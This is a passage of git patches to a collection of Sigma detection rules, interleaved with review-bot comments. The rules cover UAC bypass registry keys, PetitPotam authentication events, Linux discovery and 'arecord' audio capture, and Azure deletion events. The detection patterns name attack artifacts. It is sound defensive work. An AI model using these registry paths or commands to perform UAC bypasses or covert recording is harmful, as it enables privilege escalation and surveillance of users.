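Review bot: The new rule has no `id:` field, which is exactly the condition sigma_uuid.py reports as "has no UUID" in the previous hunk; every other rule in this series carries one, so add a freshly generated UUID, e.g. `id: <generate a new uuid4>` (placeholder). `type: PATH` records for `/etc/issue` and the release files only exist when auditd has a watch rule on those paths, and `type: EXECVE` needs execve auditing, so a `logsource` line such as `definition: 'Requires auditd watch rules on the listed files and execve auditing'` — as the two PetitPotam rules in this series do for their audit policy — would stop the rule from being silently empty in most deployments. `uname` is executed by countless scripts and `/etc/issue` is commonly read by getty on console login prompts, which is consistent with `level: low` but deserves to be spelled out in `falsepositives` beyond 'Legitimate administrative activity'.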
From: ncrqnt Date: Fri, 3 Sep 2021 12:03:38 +0200 Subject: [PATCH 0722/1367] fixed date: switched day/month --- .../win_arbitrary_shell_execution_via_settingcontent.yml | 2 +- rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml | 2 +- ...in_sticky_keys_unauthenticated_privileged_console_access.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml index fffa3a9e..8ba7965c 100644 --- a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml +++ b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml @@ -2,7 +2,7 @@ title: Arbitrary Shell Command Execution Via Settingcontent-Ms id: 24de4f3b-804c-4165-b442-5a06a2302c7e description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. author: Sreeman -date: 2020/13/03 +date: 2020/03/13 modified: 2021/08/09 references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 diff --git a/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml b/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml index 09845cc8..a3e942b8 100644 --- a/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml +++ b/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml 
@@ -3,7 +3,7 @@ id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 status: experimental description: 'Application Virtualization Utility is included with Microsoft Office.We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder or to mark a file as a system file' author: Sreeman -date: 2020/13/03 +date: 2020/03/13 modified: 2021/06/11 tags: - attack.t1218 diff --git a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml index 715dfc75..18cddb9e 100644 --- a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml +++ b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml @@ -5,7 +5,7 @@ references: - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf status: experimental -date: 2020/18/02 +date: 2020/02/18 modified: 2021/06/11 author: Sreeman tags: From 8bd859f55067c73ed74debec50b762ced43f0e8d Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 3 Sep 2021 13:07:42 +0200 Subject: [PATCH 0723/1367] Update lnx_auditd_system_info_discovery.yml --- rules/linux/auditd/lnx_auditd_system_info_discovery.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 56fba47f..1a3d1035 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml 
@@ -16,12 +16,12 @@ detection: - /etc/lsb-release - /etc/redhat-release - /etc/issue - condition: 'selection or selection2' - selection2: + selection2: type: EXECVE a0: - uname - uptime + condition: 'selection or selection2' tags: - attack.discovery - attack.t1082 From 2de2de8433fe7053bc1123f87a7199f5c53d35b4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 3 Sep 2021 11:36:43 +0200 Subject: [PATCH 0724/1367] Addition to UAC Bypasses --- .../sysmon_uac_bypass_shell_open.yml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 68481a95..42c2c471 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -1,11 +1,13 @@ title: UAC Bypass Using Registry Shell Open Keys id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 -description: Detects the pattern of UAC Bypass using fodhelper.exe or computerdefaults.exe via registry keys (UACMe 33 or 62) +description: Detects the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) author: Christian Burkard date: 2021/08/30 status: experimental references: - https://github.com/hfiref0x/UACME + - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ + - https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass tags: - attack.defense_evasion - attack.privilege_escalation 
@@ -14,10 +16,18 @@ logsource: category: registry_event product: windows detection: - selection: + selection1: TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' Details|contains: '\Software\Classes\{' - condition: selection + selection2: + TargetObject|endswith: '_Classes\ms-settings\shell\open\command\DelegateExecute' + selection3: + TargetObject|endswith: '_Classes\ms-settings\shell\open\command\(Default)' + selection4: + TargetObject|endswith: '_Classes\exefile\shell\open\command\(Default)' + filter: + Details: '(Empty)' + condition: selection1 or selection2 or ( (selection3 or selection4) and not filter) falsepositives: - Unknown level: high From f3bdb0e43d9bcfa9f78eb9483d4e49513448d22d Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 3 Sep 2021 13:18:41 +0200 Subject: [PATCH 0725/1367] fix: remove unneeded selection --- .../registry_event/sysmon_uac_bypass_shell_open.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 42c2c471..94469592 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -22,12 +22,12 @@ detection: selection2: TargetObject|endswith: '_Classes\ms-settings\shell\open\command\DelegateExecute' selection3: - TargetObject|endswith: '_Classes\ms-settings\shell\open\command\(Default)' - selection4: - TargetObject|endswith: '_Classes\exefile\shell\open\command\(Default)' + TargetObject|endswith: + - '_Classes\ms-settings\shell\open\command\(Default)' + - '_Classes\exefile\shell\open\command\(Default)' filter: Details: '(Empty)' - condition: selection1 or selection2 or ( (selection3 or selection4) and not filter) + condition: selection1 or selection2 or (selection3 and not filter) falsepositives: - Unknown level: high 
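Review bot: The new `selection4` keys on `_Classes\exefile\shell\open\command\(Default)`, but the description rewritten in the first hunk of this patch names only the ms-settings handlers (fodhelper.exe, computerdefaults.exe, slui.exe), so a reader cannot tell which bypass the exefile key is meant to cover; add a one-line comment above `selection4` naming the technique it targets, or extend the description. The filter also deserves a why-comment, e.g. `filter: # Sysmon renders an empty string as '(Empty)'; presumably excludes the value being created before the payload is written — confirm`. Note that `selection2` carries no Details constraint, unlike `selection1`, so any registry event on `DelegateExecute` under that path appears to fire on its own; if that is intended, saying so in the rule would stop the next reviewer from adding one.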
From aa2e86963c1870fe583d5c91ef8973ed0096d9b3 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 3 Sep 2021 13:21:29 +0200 Subject: [PATCH 0726/1367] fix: rename filter --- rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 94469592..032e1146 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -25,9 +25,9 @@ detection: TargetObject|endswith: - '_Classes\ms-settings\shell\open\command\(Default)' - '_Classes\exefile\shell\open\command\(Default)' - filter: + filter_sel3: Details: '(Empty)' - condition: selection1 or selection2 or (selection3 and not filter) + condition: selection1 or selection2 or (selection3 and not filter_sel3) falsepositives: - Unknown level: high From 815134df7f8fdb13e3dbc4ee90d3a899e36e49ef Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 3 Sep 2021 13:30:10 +0200 Subject: [PATCH 0727/1367] Cleanup --- .../auditd/lnx_auditd_system_info_discovery.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 1a3d1035..8578ba32 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml 
@@ -1,11 +1,11 @@ -title: 'System Information Discovery' -description: 'Detects System Information Discovery commands' +title: System Information Discovery +description: Detects System Information Discovery commands author: 'Pawel Mazur' status: experimental date: 2021/09/03 references: - - 'https://attack.mitre.org/techniques/T1082/' - - 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md' + - https://attack.mitre.org/techniques/T1082/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md logsource: product: linux service: auditd @@ -21,10 +21,10 @@ detection: a0: - uname - uptime - condition: 'selection or selection2' + condition: selection or selection2 tags: - attack.discovery - attack.t1082 falsepositives: - - 'Legitimate administrative activity' + - Legitimate administrative activity level: low From 769451dc032ff6f8e2d7d79ecdad1d7ac1e1ccbc Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 3 Sep 2021 13:42:15 +0200 Subject: [PATCH 0728/1367] Add missing id --- rules/linux/auditd/lnx_auditd_system_info_discovery.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 8578ba32..223be5b4 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -1,4 +1,5 @@ title: System Information Discovery +id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 description: Detects System Information Discovery commands author: 'Pawel Mazur' status: experimental From a7a002cb7f5f90848902a0bb494176a7059379a0 Mon Sep 17 00:00:00 2001 
From: mvelazco Date: Fri, 3 Sep 2021 10:01:54 -0400 Subject: [PATCH 0729/1367] updating fields as per frack113 feedback --- rules/windows/builtin/win_petitpotam_network_share.yml | 7 ++++--- rules/windows/builtin/win_petitpotam_susp_tgt_request.yml | 7 +++---- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/win_petitpotam_network_share.yml b/rules/windows/builtin/win_petitpotam_network_share.yml index 15ee76da..ca5ff7c2 100644 --- a/rules/windows/builtin/win_petitpotam_network_share.yml +++ b/rules/windows/builtin/win_petitpotam_network_share.yml @@ -16,9 +16,10 @@ logsource: detection: selection: EventID: 5145 - Share_Name: \\*\IPC$ - Relative_Target_Name: lsarpc - Account_Name: ANONYMOUS LOGON + ShareName|startswith: '\\' + ShareName|endswith: '\IPC$' + RelativeTargetName: lsarpc + SubjectUserName: ANONYMOUS LOGON condition: selection falsepositives: - Unknown. Feedback welcomed. diff --git a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml index da7fdf9e..a576df1b 100644 --- a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml +++ b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml @@ -23,11 +23,10 @@ logsource: detection: selection: EventID: 4768 - Account_Name|endswith: '$' - Certificate_Thumbprint: '*' + TargetUserName|endswith: '$' + CertThumbprint: '*' filter_local: - Client_Address: '::1' - + IpAddress: '::1' condition: selection and not filter_local falsepositives: - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts. From c0bdc3fb1ba26678d9541f0702102a1a9b024b94 Mon Sep 17 00:00:00 2001 
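Review bot: The falsepositives entry on the last context line of the second hunk still tells operators to filter on `Account_Name`, while this same hunk renames the selection field to `TargetUserName`, so the guidance now points at a field the rule no longer uses. Change it to `- False positives are possible if the environment is using certificates for authentication. We recommend filtering TargetUserName to the Domain Controller computer accounts.` The first hunk of this patch, in win_petitpotam_network_share.yml, has no equivalent text and needs no change.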
From: Austin Songer Date: Fri, 3 Sep 2021 22:23:21 -0500 Subject: [PATCH 0730/1367] Create azure_device_no_longer_managed_or_compliant.yml --- ..._device_no_longer_managed_or_compliant.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml diff --git a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml new file mode 100644 index 00000000..11fe4dd0 --- /dev/null +++ b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml @@ -0,0 +1,21 @@ +title: Azure Device No Longer Managed or Compliant +id: 542b9912-c01f-4e3f-89a8-014c48cdca7d +description: Identifies when a device in azure is no longer managed or compliant +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Device no longer compliant + - Device no longer managed + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Administrator may have forgotten to review the device. From b478132769fdfb947515420dce244f0ec7e8db50 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:23:59 -0500 Subject: [PATCH 0731/1367] Create azure_owner_removed_from_application_or_service_principal.yml --- ..._from_application_or_service_principal.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml diff --git a/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml new file mode 100644 index 00000000..cc6ba7d3 --- /dev/null 
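Review bot: The new rule matches `properties.message` under `service: azure.activitylogs`, but its only reference is the Azure AD audit-activity list (core directory), which is a different log stream from the subscription-level Activity Log; whether these activity names are delivered in that field under that logsource should be confirmed before merging, or the logsource should point at the Azure AD audit log instead. The same pairing is used by the new rules in PATCH 0731, 0732, 0733 and 0734 below, so one answer covers all five. A short comment on `logsource` recording where the field mapping was verified would save the next reviewer the same question.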
+++ b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml @@ -0,0 +1,23 @@ +title: Azure Owner Removed From Application or Service Principal +id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 +description: Identifies when a owner is was removed from a application or service principal in Azure. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Remove owner from service principal + - Remove owner from application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Owner being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6e15618c75baf4ed45a249054a011ce00abdac7c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:24:32 -0500 Subject: [PATCH 0732/1367] Create azure_device_or_configuration_deleted.yml --- .../azure_device_or_configuration_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_device_or_configuration_deleted.yml diff --git a/rules/cloud/azure/azure_device_or_configuration_deleted.yml b/rules/cloud/azure/azure_device_or_configuration_deleted.yml new file mode 100644 index 00000000..4156aa7d --- /dev/null +++ b/rules/cloud/azure/azure_device_or_configuration_deleted.yml 
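Review bot: The description `Identifies when a owner is was removed from a application or service principal in Azure.` has a stray verb and two article errors; change it to `description: Identifies when an owner was removed from an application or service principal in Azure.` The falsepositives bullets read fine as they stand.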
@@ -0,0 +1,23 @@ +title: Azure Device or Configuration Deleted +id: 46530378-f9db-4af9-a9e5-889c177d3881 +description: Identifies when a device or device configuration in azure is deleted. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Delete device + - Delete device configuration + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Device or device configuration being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Device or device configuration deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 70ac0104cf129996705d1538642c4a1c6f010978 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:25:01 -0500 Subject: [PATCH 0733/1367] Create azure_service_principal_removed.yml --- .../azure/azure_service_principal_removed.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_service_principal_removed.yml diff --git a/rules/cloud/azure/azure_service_principal_removed.yml b/rules/cloud/azure/azure_service_principal_removed.yml new file mode 100644 index 00000000..6be22898 --- /dev/null +++ b/rules/cloud/azure/azure_service_principal_removed.yml 
@@ -0,0 +1,21 @@ +title: Azure Service Principal Removed +id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 +description: Identifies when a service principal was removed in Azure. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: "Remove service principal" + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6744fb7f2ec6ded95cee76e72f418395f956c7e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:25:34 -0500 Subject: [PATCH 0734/1367] Create azure_application_deleted.yml --- .../cloud/azure/azure_application_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_application_deleted.yml diff --git a/rules/cloud/azure/azure_application_deleted.yml b/rules/cloud/azure/azure_application_deleted.yml new file mode 100644 index 00000000..843bb212 --- /dev/null +++ b/rules/cloud/azure/azure_application_deleted.yml 
@@ -0,0 +1,23 @@ +title: Azure Application Deleted +id: 410d2a41-1e6d-452f-85e5-abdd8257a823 +description: Identifies when a application is deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Delete application + - Hard Delete application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Application being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From c021ae9e7c8507c1b3c42018d7da249cd1e76e99 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:28:35 -0500 Subject: [PATCH 0735/1367] Update and rename azure_device_or_configuration_deleted.yml to azure_device_or_configuration_modified_or_deleted.yml --- ..._device_or_configuration_modified_or_deleted.yml} | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename rules/cloud/azure/{azure_device_or_configuration_deleted.yml => azure_device_or_configuration_modified_or_deleted.yml} (57%) diff --git a/rules/cloud/azure/azure_device_or_configuration_deleted.yml b/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml similarity index 57% rename from rules/cloud/azure/azure_device_or_configuration_deleted.yml rename to rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml index 4156aa7d..c5136d76 100644 --- a/rules/cloud/azure/azure_device_or_configuration_deleted.yml +++ b/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml 
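Review bot: The description `Identifies when a application is deleted in Azure.` should read `description: Identifies when an application is deleted in Azure.` Since `Hard Delete application` is listed as a separate activity from `Delete application`, a comment on the selection noting that both the soft and the permanent delete are covered would make the intent explicit.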
@@ -1,7 +1,7 @@ -title: Azure Device or Configuration Deleted +title: Azure Device or Configuration Modified or Deleted id: 46530378-f9db-4af9-a9e5-889c177d3881 -description: Identifies when a device or device configuration in azure is deleted. -author: Austin Songer +description: Identifies when a device or device configuration in azure is modified or deleted. +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: @@ -13,11 +13,13 @@ detection: properties.message: - Delete device - Delete device configuration + - Update device + - Update device configuration condition: selection level: medium tags: - attack.impact falsepositives: - - Device or device configuration being deleted may be performed by a system administrator. + - Device or device configuration being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Device or device configuration deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 8fe7bfc4529255d84c666efd107afba2744171fb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:28:53 -0500 Subject: [PATCH 0736/1367] Update azure_application_deleted.yml --- rules/cloud/azure/azure_application_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_application_deleted.yml b/rules/cloud/azure/azure_application_deleted.yml index 843bb212..7160069c 100644 --- a/rules/cloud/azure/azure_application_deleted.yml +++ b/rules/cloud/azure/azure_application_deleted.yml 
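Review bot: Adding `Update device` and `Update device configuration` to the same selection as the delete activities is likely to change the rule's volume considerably, since device updates are routine lifecycle events, yet the level stays `medium` and the `attack.impact` tag now also covers non-destructive modifications. Consider keeping the update activities in a separate selection with its own level, or at least a comment on the two new entries explaining which update patterns are of interest. The rename of the file and title is fine.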
@@ -1,7 +1,7 @@ title: Azure Application Deleted id: 410d2a41-1e6d-452f-85e5-abdd8257a823 description: Identifies when a application is deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: From 9d26116d272653796bacfe5d12cf47e4a1ba3591 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:29:02 -0500 Subject: [PATCH 0737/1367] Update azure_device_no_longer_managed_or_compliant.yml --- .../cloud/azure/azure_device_no_longer_managed_or_compliant.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml index 11fe4dd0..e13c480c 100644 --- a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml +++ b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml @@ -1,7 +1,7 @@ title: Azure Device No Longer Managed or Compliant id: 542b9912-c01f-4e3f-89a8-014c48cdca7d description: Identifies when a device in azure is no longer managed or compliant -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/ references: From fda1e3362e7b7321e4125acd3f80d0ffdb32f62d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:29:12 -0500 Subject: [PATCH 0738/1367] Update azure_owner_removed_from_application_or_service_principal.yml --- ...zure_owner_removed_from_application_or_service_principal.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml index cc6ba7d3..5db903ee 100644 --- a/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml +++ b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml 
@@ -1,7 +1,7 @@ title: Azure Owner Removed From Application or Service Principal id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 description: Identifies when a owner is was removed from a application or service principal in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: From c420a17e05d8848070a1dff6f62bd26afd36773c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:29:21 -0500 Subject: [PATCH 0739/1367] Update azure_service_principal_removed.yml --- rules/cloud/azure/azure_service_principal_removed.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_service_principal_removed.yml b/rules/cloud/azure/azure_service_principal_removed.yml index 6be22898..81ed2454 100644 --- a/rules/cloud/azure/azure_service_principal_removed.yml +++ b/rules/cloud/azure/azure_service_principal_removed.yml @@ -1,7 +1,7 @@ title: Azure Service Principal Removed id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 description: Identifies when a service principal was removed in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: From 0612ea7f6e468bb6a2741f4c39ce58e36aeb4d2b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:42:26 -0500 Subject: [PATCH 0740/1367] Update azure_device_no_longer_managed_or_compliant.yml --- .../cloud/azure/azure_device_no_longer_managed_or_compliant.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml index e13c480c..13be7277 100644 --- a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml +++ b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml 
@@ -3,7 +3,7 @@ id: 542b9912-c01f-4e3f-89a8-014c48cdca7d description: Identifies when a device in azure is no longer managed or compliant author: Austin Songer @austinsonger status: experimental -date: 2021/ +date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory logsource: From e7c582777636dd563250eda84cab0faf8cdc3f90 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:43:11 -0500 Subject: [PATCH 0741/1367] Update azure_service_principal_removed.yml --- rules/cloud/azure/azure_service_principal_removed.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_service_principal_removed.yml b/rules/cloud/azure/azure_service_principal_removed.yml index 81ed2454..e0501252 100644 --- a/rules/cloud/azure/azure_service_principal_removed.yml +++ b/rules/cloud/azure/azure_service_principal_removed.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: "Remove service principal" + properties.message: Remove service principal condition: selection level: medium tags: From caf78b5ea13dc20944779fb6b8da915cb5be3ff9 Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Sat, 4 Sep 2021 22:10:34 +0200 Subject: [PATCH 0742/1367] New Rule - Linux-Audio-Capture --- .../linux/auditd/lnx_auditd_audio_capture.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_audio_capture.yml diff --git a/rules/linux/auditd/lnx_auditd_audio_capture.yml b/rules/linux/auditd/lnx_auditd_audio_capture.yml new file mode 100644 index 00000000..3d3c5ccd --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_audio_capture.yml 
@@ -0,0 +1,28 @@ +title: Audio Capture +id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 +description: Detects attempts to record audio with arecord utility + #the actual binary that arecord is using and that has to be monitored is /usr/bin/aplay +author: 'Pawel Mazur' +status: experimental +date: 2021/09/04 +references: + - https://attack.mitre.org/techniques/T1123/ +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: + - arecord + a1: + - '-vv' + a2: + - '-fdat' + condition: selection +tags: + - attack.collection + - attack.t1123 +falsepositives: + - None +level: low From fa5554660cb563c838955eae61602435deb3345a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 4 Sep 2021 17:33:05 -0500 Subject: [PATCH 0743/1367] Update sysmon_mal_cobaltstrike_re.yml --- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 3a857bbc..1ecc14c6 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -6,7 +6,7 @@ references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 -modifed: 2021/09/02 +modified: 2021/09/02 author: Florian Roth tags: - attack.defense_evasion From 5042ba65ac87557c931f3208c46d0d925ca46ee8 Mon Sep 17 00:00:00 2001 